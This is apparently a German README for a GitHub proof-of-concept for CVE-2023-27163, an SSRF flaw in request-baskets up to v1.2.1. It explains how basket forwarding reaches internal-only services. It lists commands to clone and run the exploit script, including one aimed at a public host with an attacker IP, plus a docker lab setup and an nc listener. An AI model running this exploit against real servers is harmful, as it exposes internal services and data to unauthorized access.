
Proof of Concept für Server Side Request Forgery (SSRF) in request-baskets (V<= v.1.2.1)
Dieses Repository enthält einen Proof-of-Concept (PoC) für CVE-2023-27163, eine Server-Side Request Forgery (SSRF) Schwachstelle, die in request-baskets bis Version 1.2.1 entdeckt wurde. Diese Schwachstelle ermöglicht es Angreifern, auf Netzwerkressourcen und sensible Informationen zuzugreifen, indem sie die Komponente /api/baskets/{name} durch eine manipulierte API-Anfrage ausnutzen.
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <attacker IP>
Request-baskets ist eine Webanwendung, die entwickelt wurde, um Anfragen auf einer bestimmten Route zu sammeln und zu registrieren, dem sogenannten Basket. Beim Erstellen kann der Benutzer einen anderen Server angeben, an den die Anfrage weitergeleitet wird. Das Problem dabei ist, dass der Benutzer ungewollte Dienste, wie z.B. netzwerkabgeschottete Anwendungen, spezifizieren kann.
Zum Beispiel: Angenommen, der Server hostet Request-baskets (Port 55555) und einen Flask-Webserver auf Port 8000. Der Flask ist außerdem so konfiguriert, dass er nur mit localhost interagiert. Durch das Erstellen eines Baskets, der an http://localhost:8000 weiterleitet, kann der Angreifer auf den zuvor eingeschränkten Flask-Webserver zugreifen.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
``` git clone https://github.com/MasterCode112/CVE-2023-27163.git
2. Lade den PoC herunter
```shell
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/